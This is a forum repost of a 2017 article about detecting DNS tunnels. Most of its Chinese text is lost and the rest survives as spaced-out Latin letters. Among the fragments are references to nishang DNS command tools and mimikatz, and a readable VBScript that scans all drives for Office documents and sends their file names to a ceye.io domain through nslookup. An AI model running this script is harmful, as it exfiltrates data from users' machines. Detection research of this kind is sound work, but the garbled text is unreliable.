搜索

[11872] 2017-10-09_一次误报引发的DNS检测方案的思考:DNS隧道检测平民解决方案

文档创建者:s7ckTeam
浏览次数:19
最后更新:2025-01-18
2017-10-09_一次误报引发的DNS检测方案的思考:DNS隧道检测平民解决方案 D N S D N S C h u a n F i l e   F r e e B u f   2 0 1 7 - 1 0 - 0 9 * C h u a n F i l e   F r e e B u f   d n s 广 广 x s h e l l d n s x s h e l l d n s d n s d n s d n s d n s 1 2 t x t 5 3 广 1 * * * * a )         1 d n s d n s d n s                                                 b )           2 d n s 8 . 8 . 8 . 8 d n s d n s c )           3 d n s 8 . 8 . 8 . 8 d n s d n s d )           4 d n s d n s d n s e )           5 d n s d n s 2 * * * * a )           1 d n s d n s s v c h o s t . e x e d n s d n s b )           2 d n s d n s d n s
s v c h o s t . e x e d n s c )           3 d n s x s h e l l d )           4 d n s x s h e l l d n s e )           5 d n s d n s d n s 3 * * d n s * * a )           t x t A C & C i .                     d n s d n s i i .                     d n s i p s o c k e t b )           t x t A C & C x s h e l l i .                     d n s d n s t x t A i i .                     d n s s o c k e t c )           t x t A C & C d n s d n s d n s i .                     d n s d n s t x t A i i .                     A 访 s o c k e t d )           t x t A C & C 使 d n s d n s d n s i .                     d n s d n s A i i .                   A 访 : d n s d n s s n o r t i o c i p d n s i p i p h t t p s o c k e t d n s t x t c & c d n s d n s * d n s
d n s t x t i p 访 1             o r       a n d   A 访   a n d                       o r       a n d   A 访   a n d     a n d   t x t { t x t a n d   }     o r     { A 访     a n d   } 2         3 + N   *     >             A 3 + N *   A     +   B   +     >       X s h e l l 1 x s h e l l d n s 2 3 a )           b )           c )           T X T d )           A 访 e )           + P o w e r s h e l l   d n s
1 p o w e r s h e l l d n s a )           b )           使 n i s h a n g O u t - N n s T x t G e t S e r v i c e T o T x t . p s 1 t x t c )           d n s t x t 1 , 2 , 3 , 4 1 o k
d )           使 n i s h a n g D N S _ T X T _ P w n a g e t x t t e s t . c o m 1 1 . t e s t . c o m t x t s t o p s t r i n g   D N S _ T X T _ P w n a g e   - s t a r t d o m a i n s t a r t f l a g . t e s t . c o m   - c m d s t r i n g   n o s t a r t   - c o m m a n d d o m a i n     t x t 1 . t e s t . c o m   - p s s t r i n g s t a r t f l a g   - p s d o m a i n   t e s t . c o m   - S u b d o m a i n s   1   - s t o p s t r i n g   s t o p f l a g 2 使 M i c r o s o f t   N e t w o r k   M o n i t o r 3 a )           d n s 使 b )           g e t - s e r v e r m i m i k a t z c )           T X T d )           A 访 e )          
c e y e . i o 1   a )           w i n d o w s p i n g n s l o o k u p b )         w o r d e x c e l p p t ( 3 6 0   ) v b s   (   ) 2 a )           b )           3 a )           A t x t ' O n   E r r o r R e s u m e   N e x t S e t   f s o   = C r e a t e O b j e c t ( " S c r i p t i n g . F i l e S y s t e m O b j e c t " ) t o o l s N a m e = A r r a y ( " . d o c x " , " . d o c " , " . x l s " , " . x l s x " , " . p p t " , " . p p t x " ) ' C o n s t D R I V E _ L E T T E R S = " C : D : E : F : G : H : I : J : K : L : M : N : O : P : Q : R : S : T : U : V : W : X : Y : Z " C o n s t D R I V E _ L E T T E R S = " o " ' ' ' ' ' ' ' ' ' ' ' ' C a l l S c a n D r i v e s ( )                                             ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' S u b S c a n D r i v e s ( )           D i m   d r i v e s           d r i v e s = S p l i t ( D R I V E _ L E T T E R S , " : " )           F o r   E a c h   d r v   I n   d r i v e s                 I f   f s o . D r i v e E x i s t s ( d r v )   T h e n                           S e t   d r i v e = f s o . G e t D r i v e ( d r v )                         I f   d r i v e . i s R e a d y   T h e n                                 C a l l S c a n F i l e s ( d r i v e . R o o t F o l d e r )                         E n d   I f                 E n d   I f           N e x t   E n d   S u b   ' ' ' ' ' ' ' ' ' ' ' '   S u b S c a n F i l e s ( f o l d e r )           F o r   E a c h   t h i s _ f i l e   I n   f o l d e r . F i l e s                 O n   E r r o r   R e s u m e   N e x t                 C a l l   F i n d K e y F i l e ( t h i s _ f i l e )                 W S c r i p t . S l e e p   1           N e x t         F o r   E a c h   t h i s _ f o l d e r   I n   f o l d e r . S u b F o l d e r s                 O n   E r r o r   R e s u m e   N e x t                 C a l l   S c a n F i l e s ( t h i s _ f o l d e r )                 W S c r i p t . S l e e p   1           N e x t         E n d   S u b   ' ' ' ' ' ' ' ' ' ' '   S u b F i n d K e y F i l e ( f i l e )         O n   E r r o r   R e s u m e   N e x t       F o r   E a c h   t o o l _ n a m e   I n   t o o l s N a m e                   ' W S c r i p t . E c h o                     ' ' ' '                   I f I n S t r ( U C a s e ( f i l e . n a m e ) , U C a s e ( t o o l _ n a m e ) )   < > 0   T h e n                           D n s S t r =   f i l e . n a m e   & " . x x x x x x x . c e y e . i o "                 ' ' ' ' n s l o o k u p                                                   s e t o b j S h e l l = w s c r i p t . c r e a t e O b j e c t ( " w s c r i p t . s h e l l " )                                             o b j S h e l l . e x e c ( " % c o m s p e c %   / c   n s l o o k u p   "   &   D n s S t r )                           E n d   I f           N e x t   E n d   S u b
8 . 8 . 8 . 8 d n s b )           A 访 c )           * C h u a n F i l e   F r e e B u f  
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理